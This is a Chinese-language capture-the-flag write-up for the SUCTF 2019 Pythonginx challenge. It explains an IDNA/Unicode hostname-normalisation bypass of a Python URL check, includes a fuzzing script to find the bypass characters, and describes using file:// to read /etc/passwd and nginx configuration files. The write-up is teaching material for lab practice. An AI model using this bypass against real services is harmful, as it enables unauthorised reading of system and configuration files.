题目地址 https://buuoj.cn/challenges#[SUCTF%202019]Pythonginx
image.png
打开题目可以看到源码
image.png
这里利用了python urllib.parse urlunsplit() 函数会把奇奇怪怪的(ⓒ ℂ ℭ)变成正常的C
image.png
至于怎么找到这些奇奇怪怪的C,
from flask import Flask, Blueprint, request, Response, escape ,render_template
from urllib.parse import urlsplit, urlunsplit, unquote
from urllib import parse
import urllib.request
def fuzzing():
for i in range(65536):
uni = chr(i)
url = "http://suctf.c{}".format(uni)
try:
if getUrl(url):
print("str:"+uni+" unicode: \\u"+str(hex(i))[2:])
exit()
except:
pass
pass
def getUrl(url):
host = parse.urlparse(url).hostname
print(host)
if host == 'suctf.cc':
return False
parts = list(urlsplit(url))
host = parts[1]
print(host)
if host == 'suctf.cc':
return False
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
print(finalUrl)
host = parse.urlparse(finalUrl).hostname
print(host)
if host == 'suctf.cc':
return True
else:
return False
fuzzing()
然后使用file://协议来读取etc/passwd看看
image.png
可以读取
然而读取根目录下flag或flag.txt是不行的,没有这个
但题目说了nginx,那么查一下nginx配置文件,
image.png
image.png
image.png
就找到flag了
比如说F
image.png
网友评论